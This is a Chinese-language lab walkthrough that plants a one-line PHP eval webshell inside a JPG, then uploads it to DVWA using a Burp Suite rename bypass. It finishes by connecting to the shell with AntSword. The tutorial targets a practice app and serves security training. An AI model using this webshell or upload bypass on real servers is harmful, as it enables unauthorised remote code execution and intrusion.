一、 隨便找一張jpg圖片
二、 新建一個txt檔案
三、 在文本檔案中寫入一句話木馬
本次實驗使用的木馬為password
<?php @eval($_POST['密碼']);?>
四、 寫入完成后將后綴名.txt改為.php
五、 合并檔案
通過CMD進入儲存jpg檔案和php檔案的目錄
命令格式: cd C:\muma
使用copy命令合并檔案
命令格式: copy 圖片.jpg/b + 木馬.php/a 合成.jpg
最后輸出合并的木馬檔案muma.jpg
六、 打開靶場登陸DVWA
默認用戶名admin
默認密碼password
七、更改安全性
左側點擊DVWA Security更改安全性 改為low點擊 Submit 確定
八、 準備上傳
點擊左側的File Upload(檔案上傳)
然后將FoxyProxy的Burp代理打開
FoxyProxy安裝與配置
九、 開啟BURP SUITE
kali直接在終端中輸入burpsuite即可打開
Windows與mac端需要自行安裝
十、 配置BURP
BURP內點擊Proxy(代理)再點擊Intercept(截斷)之后等待資料包
十一、 上傳
點擊瀏覽 選擇剛剛合并出來的muma.jpg檔案 然后點擊上傳或者(Upload)
十二、BURP截包
點擊上傳后 瀏覽器開始無回應 開始BURP發現已經將資料包攔截了下來
十三、 修改資料包
將下方抓到的寶muma.jpg改為muma.php然后點擊右上角的放包(Forward)一直點擊 直到變成灰色無法點擊為止
十四、 查看上傳路徑
紅字提示上傳檔案到../../hackable/uploads/muma.php
當前URL欄中的路徑為/xxx.xxx.xxx.xxx/DVWA/vulnerabilities/upload#
../的意思為回傳上一級目錄 兩個../../代表回傳前兩個目錄 也就代表回傳到了/xxx.xxx.xxx.xxx/DVWA/目錄
結合提供的路徑得出 上傳的完整路徑為/xxx.xxx.xxx.xxx/DVWA/hackable/uploads/muma.php
十五、 驗證木馬
在瀏覽器的URL欄中輸入剛剛得出的路徑 查看是否能得到反饋 出現資訊 代表木馬存在 然后復制下當前的URL地址等待連接
十六、 連接木馬
打開蟻劍 右鍵空白處 點擊添加資料
URL地址中粘貼剛剛復制的地址
連接密碼填寫制作一句話木馬時設定的密碼
完成后點擊添加
視窗自動關閉 下方顯示添加資料成功
雙擊添加的木馬 出現檔案串列 代表一句話木馬上傳并成功
相關鏈接 FoxyProxy安裝與配置
如有問題 還請見諒
注意:本實驗僅供個人測驗時使用 請勿用于非法用途
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/280308.html
標籤:其他